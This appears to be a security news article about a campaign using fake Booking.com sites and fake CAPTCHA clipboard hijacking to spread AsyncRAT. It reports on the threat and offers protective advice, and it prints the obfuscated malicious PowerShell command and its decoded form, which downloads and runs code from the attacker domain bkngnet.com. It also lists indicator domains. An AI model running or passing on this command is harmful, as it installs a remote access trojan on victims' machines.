Cybercriminals Launch Fake Booking.com Sites to Spread AsyncRAT Malware

TL;DR

Cybercriminals are redirecting users to fake Booking.com sites to spread AsyncRAT malware. This campaign exploits fake CAPTCHA forms to hijack clipboards and trick users into executing malicious commands. Protect yourself by being cautious with online links and using reliable anti-malware solutions.

Introduction

Cybercriminals have launched a new campaign involving fake Booking.com websites to distribute the AsyncRAT malware. According to Malwarebytes, this is a major threat affecting a significant number of people. In this article, we will delve into the details of this campaign, how it operates, and the necessary steps to protect yourself.

Understanding the Threat

Campaign Overview

Cybercriminals are redirecting users to fake Booking.com sites through links placed on gaming websites, social media, and sponsored ads. This campaign, which began in mid-May, capitalizes on the fact that 40% of travel bookings are made through general online searches, providing ample opportunities for scammers.

Redirection and Fake CAPTCHA Strategy

The fake sites employ a familiar strategy where fake CAPTCHA forms hijack the user’s clipboard. These forms trick visitors into executing malicious commands on their devices. The redirection destinations change every two to three days, making it difficult to track and block these malicious sites.

Fake CAPTCHA prompt

Malicious Commands and Clipboard Hijacking

Interacting with the fake CAPTCHA form allows the website to copy a malicious command to the user’s clipboard. This command, disguised with mixed casing and quote interruptions, is designed to open a hidden PowerShell window and download the AsyncRAT malware.

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"

When decoded, the command executes the following:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

Malware Execution and Impact

If executed, the command downloads and runs ckjg.exe, which in turn downloads Stub.exe, detected as Backdoor.AsyncRAT. This malware allows cybercriminals to remotely monitor and control infected devices, leading to potential financial damages and identity theft.

Protection Measures

Browser Warnings and Protections

Users of Chrome may see a warning when attempting to copy the malicious command, but the warning might not be clear. Malwarebytes Browser Guard provides a more explicit warning, alerting users that their clipboard has been accessed.

Malwarebytes Browser Guard’s clipboard warning

Preventive Steps

To protect yourself from this threat, consider the following steps:

• Be Cautious: Do not follow instructions from unknown websites without careful consideration.
• Use Anti-Malware Solutions: Employ active anti-malware tools that block malicious websites and scripts.
• Browser Extensions: Utilize browser extensions that block malicious domains and scams.
• Disable JavaScript: Disable JavaScript in your browser before visiting unknown websites to prevent clipboard access.

Indicators of Compromise (IOCs)

The domains associated with this campaign rotate frequently. Here is a list of recently active domains:

• (booking.)chargesguestescenter[.]com
• (booking.)badgustrewivers.com[.]com
• (booking.)property-paids[.]com
• (booking.)rewiewqproperty[.]com
• (booking.)extranet-listing[.]com
• (booking.)guestsalerts[.]com
• (booking.)gustescharge[.]com
• kvhandelregis[.]com
• patheer-moreinfo[.]com
• guestalerthelp[.]com
• rewiewwselect[.]com
• hekpaharma[.]com
• bkngnet[.]com
• partnervrft[.]com

Malwarebytes blocks the download from bkngnet[.]com

Conclusion

The threat posed by fake Booking.com sites distributing AsyncRAT malware underscores the importance of vigilance and proactive security measures. By being cautious with online links and using reliable anti-malware solutions, you can protect yourself from this and similar threats. Stay informed and take the necessary steps to safeguard your digital identity.

For more details, visit the full article: source

References